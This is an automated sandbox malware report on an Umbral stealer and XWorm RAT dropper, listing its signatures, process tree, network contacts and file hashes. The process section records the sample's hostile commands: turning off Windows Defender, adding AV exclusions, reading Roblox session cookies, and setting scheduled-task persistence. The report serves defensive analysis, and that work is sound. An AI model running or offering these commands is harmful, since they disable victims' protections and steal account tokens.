Malware Analysis Report

2024-10-10 10:10

Sample ID 240518-rle4cafc9w
Target New_Project_1 (5).exe
SHA256 0f10ed177734b40d0ca45eed258f8c3ca585323e32db8f3cab7387b61de0e679
Tags
umbral xworm execution persistence rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0f10ed177734b40d0ca45eed258f8c3ca585323e32db8f3cab7387b61de0e679

Threat Level: Known bad

The file New_Project_1 (5).exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan upx

Detect Umbral payload

Umbral

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

UPX packed file

Enumerates connected drives

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-18 14:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-18 14:16

Reported

2024-05-18 14:19

Platform

win7-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\2.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Local\Temp\1.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Local\Temp\1.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\svchost.exe N/A
N/A N/A C:\Users\Admin\svchost.exe N/A
N/A N/A C:\Users\Admin\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\1.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2896 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 2896 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 2896 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 2896 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 2896 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2896 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2896 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 2896 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 3040 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\system32\attrib.exe
PID 3040 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\system32\attrib.exe
PID 3040 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\system32\attrib.exe
PID 3040 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 2112 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3040 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 3040 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\system32\cmd.exe
PID 3040 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\system32\cmd.exe
PID 3040 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1356 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 1356 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 1356 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2112 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\schtasks.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\schtasks.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\schtasks.exe
PID 2876 wrote to memory of 3060 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\svchost.exe
PID 2876 wrote to memory of 3060 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe

"C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe"

C:\Users\Admin\AppData\Local\Temp\1.exe

"C:\Users\Admin\AppData\Local\Temp\1.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchost.exe'

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\svchost.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {0639B9C5-C005-4526-96B9-CC71A2396193} S-1-5-21-2737914667-933161113-3798636211-1000:PUMARTNR\Admin:Interactive:[1]

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 reference-elliott.gl.at.ply.gg udp
US 147.185.221.19:37420 reference-elliott.gl.at.ply.gg tcp

Files

memory/2896-0-0x0000000000400000-0x000000000047C000-memory.dmp

\Users\Admin\AppData\Local\Temp\1.exe

MD5 4e4ffd6981f1d7df1e06e02c7a52e86a
SHA1 970d227a122a826f587fb49c694a422ec6aff1e0
SHA256 353010e5cbdfb234aadfcb40b517b51b24bbac81b64d794d5d8f8b1cd0cd6031
SHA512 1f75401fe015416453119bb92ea46c71412f342fe4bf1170bc2655a1c4f1fb4344bdff64df8dfd54f8203b30445225a70f12790432d3b59693e96de2fa5750ec

\Users\Admin\AppData\Local\Temp\2.exe

MD5 8068d967a754039c953d677ed75caa65
SHA1 c6ca62d0e3f84f4018546cdf40b14ac80b06af95
SHA256 b2811334ba1ec945f7f2f1b1976e72dd634a4cf8b5679ceb4c90816d5b646b11
SHA512 8f8f9b0c50f3178daa1df6ce16755c7a0de24872a344fe6b93d1a9b11cfad2faa1ed5ad58c6ac9904b889188d8efaba2d51e4240e7a813fffe6878ec8970954c

memory/2112-14-0x0000000000FD0000-0x0000000000FEC000-memory.dmp

memory/3040-15-0x00000000009E0000-0x0000000000A20000-memory.dmp

memory/2720-20-0x000000001B660000-0x000000001B942000-memory.dmp

memory/2720-21-0x0000000002960000-0x0000000002968000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bfd7829f2073deb87dafeeda79852b3b
SHA1 2343b51fe778e76bae37ca0df67a3c5bb43163ee
SHA256 8ad2a108989a5fb1d0063ad210632f62621ce544a5415512f11af9f83a3e8fef
SHA512 d6ce7740e9e9d95913d421e5f9cc95d3075c593a9928a60b7ebc3a606730c67c735c83fbc2ce9634880771eefd48c2b532da0872e1e2fb1c9bd58341f13f3732

memory/1792-27-0x000000001B520000-0x000000001B802000-memory.dmp

memory/1792-28-0x0000000002790000-0x0000000002798000-memory.dmp

memory/2092-55-0x0000000002240000-0x0000000002248000-memory.dmp

memory/2472-66-0x000000001B6A0000-0x000000001B982000-memory.dmp

memory/2472-67-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3060-89-0x0000000001350000-0x000000000136C000-memory.dmp

memory/2688-93-0x00000000003F0000-0x000000000040C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-18 14:16

Reported

2024-05-18 14:19

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\2.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Local\Temp\1.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Local\Temp\1.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\1.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A

